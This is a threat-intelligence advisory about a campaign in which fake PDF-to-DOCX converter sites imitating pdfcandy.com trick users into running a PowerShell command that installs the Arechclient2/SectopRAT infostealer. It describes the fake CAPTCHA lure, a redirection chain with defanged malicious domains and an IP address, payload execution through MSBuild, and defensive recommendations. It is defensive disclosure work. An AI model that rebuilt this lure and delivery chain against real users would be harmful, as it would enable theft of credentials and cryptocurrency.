A highly targeted malware campaign is exploiting users’ trust in online file conversion services by mimicking the legitimate platform pdfcandy.com. The attack utilizes fake PDF-to-DOCX converters designed to deceive victims into running a malicious PowerShell script, which installs Arechclient2, a variant of the SectopRAT infostealer. This malware is engineered to extract sensitive data such as browser credentials and cryptocurrency wallet contents.

To enhance credibility and manipulate user behavior, the attackers employ convincing tactics including fake file processing animations, counterfeit CAPTCHA prompts and subtle psychological cues. The delivery mechanism is further obscured by a multi-layered redirection chain that ultimately downloads a malicious archive named adobe.zip, hiding the true nature of the threat.

‍

Technical Description

Millions rely on online PDF converters for fast and convenient file format changes—but these free tools can come with hidden dangers. Just last month, the FBI issued a warning about cybercriminals exploiting these services to distribute malware.

Soon after, cybersecurity company CloudSEK exposed a sophisticated scheme involving a fraudulent PDF-to-DOCX converter. The fake tool mimicked the legitimate site pdfcandy.com, tricking users into engaging with malicious software.

‍

Sophisticated Social Engineering Techniques:

The malicious websites deploy a layered social engineering approach to deceive users. After a file is uploaded, a fake processing animation mimics a real conversion process, instilling a false sense of trust. This is quickly followed by a sudden CAPTCHA challenge, designed to imitate standard security protocols and reinforce legitimacy. The prompt creates a sense of urgency, encouraging users to act hastily without questioning the website’s authenticity. This manipulation taps into familiar online behaviors, lowering users’ guard and paving the way for malware installation.

‍

PowerShell Command as a Delivery Mechanism:

Once the CAPTCHA is completed, the site instructs users to run a PowerShell command, accompanied by step-by-step instructions to encourage execution. This marks the shift from psychological manipulation to direct system compromise. The command appears harmless to non-technical users, leveraging the site’s professional design to inspire confidence. Critically, this command initiates the download and launch of the malware, circumventing conventional security tools that rely on detecting suspicious files or user hesitation.

‍

Obfuscated Redirection Chain for Malware Deployment:

Executing the PowerShell command sets off a complex redirection chain meant to mask the delivery of the malicious payload. It begins with a request to bind-new-connect[.]click/santa/bee, masked by a shortened link (https[://]bitly[.]cx[/]SMma). This link redirects to https[://]bitly[.]cx[/]Www0 and finally to bind-new-connect[.]click/marmaris/later, which serves the payload archive, adobe.zip. Hosted on IP 172[.]86[.]115[.]43, a known malicious server flagged by VirusTotal, the layered redirection strategy makes tracing and detection significantly more difficult, highlighting the attackers’ technical sophistication.

‍

Payload Structure and Execution Strategy:

The downloaded archive, adobe.zip, extracts a folder named SoundBAND containing the executable audiobit[.]exe. When launched, this executable spawns cmd[.]exe, which in turn invokes MSBuild[.]exe—a legitimate Windows tool. The attackers exploit MSBuild as a “living-off-the-land” binary (LotL), using it to load Arechclient2, a .NET-based variant of SectopRAT active since 2019. According to ThreatFox, this malware specializes in stealing browser credentials, cryptocurrency wallets and other confidential data. By embedding the payload within trusted system processes, the attackers effectively evade standard antivirus detection mechanisms.

‍

SectopRAT’s Delivery Tactics and Threat Capabilities:

SectopRAT leverages a variety of distribution techniques to broaden its reach, including malvertising through Google Ads and deceptive software update prompts. One prominent domain, bind-new-connect[.]click, has been identified as a key distributor, specifically involved in delivering the ArechClient variant. This malware is equipped with powerful functionalities such as keystroke logging, screen capturing and data exfiltration, posing a serious security risk. Its continued evolution and adaptability demonstrate the attackers’ ability to refine their methods in response to modern defense strategies.

‍

Multi-Stage Attack Chain and Persistence Mechanisms:

The attack follows a structured, multi-phase chain—starting with social engineering, transitioning to the delivery of the malicious payload and ending with the execution of the malware. Once deployed, Arechclient2 establishes persistence on the victim’s system, enabling ongoing data theft. A detailed execution report from ANY.RUN illustrates the full chain of events, revealing how audiobit[.]exe coordinates the attack. The adversaries’ use of legitimate system utilities like MSBuild, combined with heavily obfuscated redirection paths, complicates incident analysis and detection—demanding advanced tools and techniques for effective threat mitigation.

‍

Conclusion:

This investigation reveals how threat actors are exploiting the widespread use of online file converters to deliver sophisticated malware. By mimicking trusted platforms and using layered social engineering tactics, attackers manipulate users into executing malicious PowerShell commands. The campaign’s use of complex redirection chains and legitimate system tools like MSBuild helps it evade detection. As such threats grow more advanced, users and organizations must exercise caution and prioritize cybersecurity awareness when interacting with online services.

‍

Impact

This campaign poses a significant threat to both individuals and organizations by enabling the theft of sensitive data such as browser credentials and cryptocurrency wallets. Its ability to bypass traditional security measures using legitimate system tools makes detection and response challenging. If widespread, such attacks could lead to financial losses, identity theft and long-term system compromise.

‍

IOC and Context Details

‍

Recommended Actions

1. Use only official sources: Always access file conversion tools directly from their official websites—avoid using search results to find “free converters.”
2. Keep security software updated: Regularly update antivirus and anti-malware programs and scan all downloads before opening them.
3. Implement advanced threat detection: Deploy Endpoint Detection and Response (EDR) solutions to monitor and respond to suspicious behavior.
4. Utilize DNS and Web Filtering: Use DNS-level traffic filters and browser security extensions to block access to known malicious or suspicious domains.
5. Verify file integrity: Check file types beyond just the file extension to detect disguised or potentially harmful files.
6. Educate users on social engineering tactics: Train users to recognize red flags such as PowerShell execution prompts, fake CAPTCHA prompts and slight domain name changes.
7. Use offline conversion tools: Opt for offline file converters when possible to eliminate the risk of uploading documents to compromised online services.
8. Restrict file uploads in sensitive environments: Limit or monitor the use of online converters in corporate or high-security settings to reduce exposure.
9. Respond swiftly to suspicious activity: Immediately isolate any potentially compromised device, change passwords from a clean system and notify relevant financial institutions or authorities.
10. Prepare for incidents proactively: Develop, test and regularly update incident response plans, and consider implementing Content Disarm and Reconstruction (CDR) technologies for added protection.

‍